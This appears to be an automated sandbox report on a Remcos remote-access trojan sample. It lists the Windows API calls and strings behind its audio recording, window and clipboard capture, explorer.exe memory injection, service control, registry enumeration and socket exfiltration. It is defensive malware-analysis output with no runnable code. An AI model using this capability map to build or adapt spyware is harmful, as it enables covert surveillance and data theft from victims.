                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                              • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                              • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                              • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                              APIs
                                                                • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                              • GetLastError.KERNEL32 ref: 00455D6F
                                                              • __dosmaperr.LIBCMT ref: 00455D76
                                                              • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                              • GetLastError.KERNEL32 ref: 00455D8C
                                                              • __dosmaperr.LIBCMT ref: 00455D95
                                                              • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                              • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                              • GetLastError.KERNEL32 ref: 00455F31
                                                              • __dosmaperr.LIBCMT ref: 00455F38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                              • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                              • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                              • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
• __alloca_probe_16.LIBCMT ref: 0044AD5B
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
• __alloca_probe_16.LIBCMT ref: 0044AE40
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
• __freea.LIBCMT ref: 0044AEB0
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
• __freea.LIBCMT ref: 0044AEB9
• __freea.LIBCMT ref: 0044AEDE
Memory Dump Source
• Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID: PkGNG$tC

• API ID: _free
• String ID: \&G$\&G$`&G

• String ID: 65535$udp

APIs
• __Init_thread_footer.LIBCMT ref: 0040AD73
• Sleep.KERNEL32(000001F4), ref: 0040AD7E
• GetForegroundWindow.USER32 ref: 0040AD84
• GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
• Sleep.KERNEL32(000003E8), ref: 0040AE8F
  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
• GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
• __dosmaperr.LIBCMT ref: 0043A926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
• GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
• __dosmaperr.LIBCMT ref: 0043A963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
• __dosmaperr.LIBCMT ref: 0043A9B7
• _free.LIBCMT ref: 0043A9C3
• _free.LIBCMT ref: 0043A9CA
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free

APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage

APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: 0VG$0VG$<$@$Temp

APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
• GetFileSize.KERNEL32(?,00000000), ref: 0041346D
• UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
• CloseHandle.KERNEL32(00000000), ref: 0041349A
• CloseHandle.KERNEL32(?), ref: 004134A0
• API ID: File$CloseHandleView$CreateMappingSizeUnmap

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
• API ID: Service$CloseHandle$Open$ControlManager

APIs
• _free.LIBCMT ref: 004481B5
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 004481C1
• _free.LIBCMT ref: 004481CC
• _free.LIBCMT ref: 004481D7
• _free.LIBCMT ref: 004481E2
• _free.LIBCMT ref: 004481ED
• _free.LIBCMT ref: 004481F8
• _free.LIBCMT ref: 00448203
• _free.LIBCMT ref: 0044820E
• _free.LIBCMT ref: 0044821C
• API ID: _free$ErrorFreeHeapLast

• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt

APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
• __fassign.LIBCMT ref: 0044B4F9
• __fassign.LIBCMT ref: 0044B514
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
• WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID: PkGNG
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                              Similarity
                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe), ref: 004074D9
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                              APIs
                                                              • _strftime.LIBCMT ref: 00401D50
                                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                              Similarity
                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                              • int.LIBCPMT ref: 00410EBC
                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                              • String ID: ,kG$0kG
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                              • waveInStart.WINMM ref: 00401CFE
                                                              Similarity
                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                              • String ID: dMG$|MG$PG
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                              Similarity
                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                              • String ID: Remcos
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                              • __freea.LIBCMT ref: 00454083
                                                              • __freea.LIBCMT ref: 0045408F
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                              • _free.LIBCMT ref: 00445515
                                                              • _free.LIBCMT ref: 0044552E
                                                              • _free.LIBCMT ref: 00445560
                                                              • _free.LIBCMT ref: 00445569
                                                              • _free.LIBCMT ref: 00445575
                                                              Similarity
                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                              • String ID: C
                                                              Similarity
                                                              • String ID: tcp$udp
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                                              • ExitThread.KERNEL32 ref: 004018F6
                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              Similarity
                                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                              • String ID: PkG$XMG$NG$NG
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                              • String ID: .part
                                                              APIs
                                                              • SendInput.USER32 ref: 00419A25
                                                              • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InputSend$Virtual
                                                              • String ID:
                                                              • API String ID: 1167301434-0
                                                              • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                              • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                              • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                              • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16_free
                                                              • String ID: a/p$am/pm$h{D
                                                              • API String ID: 2936374016-2303565833
                                                              • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                              • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                              • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                              • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                              APIs
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • _free.LIBCMT ref: 00444E87
                                                              • _free.LIBCMT ref: 00444E9E
                                                              • _free.LIBCMT ref: 00444EBD
                                                              • _free.LIBCMT ref: 00444ED8
                                                              • _free.LIBCMT ref: 00444EEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID: KED
                                                              • API String ID: 3033488037-2133951994
                                                              • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                              • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                              • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                              • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                              APIs
                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Enum$InfoQueryValue
                                                              • String ID: [regsplt]$xUG$TG
                                                              • API String ID: 3554306468-1165877943
                                                              • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                              • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                              • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                              • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                              • String ID: xUG$NG$NG$TG
                                                              • API String ID: 3114080316-2811732169
                                                              • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                              • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                              • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                              • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                              • __freea.LIBCMT ref: 0045129D
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID: PkGNG
                                                              • API String ID: 313313983-263838557
                                                              • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                              • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                              • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                              • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                              APIs
                                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                              • _wcslen.LIBCMT ref: 0041B7F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                              • API String ID: 37874593-122982132
                                                              • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                              • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                              • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                              • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                              APIs
                                                                • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
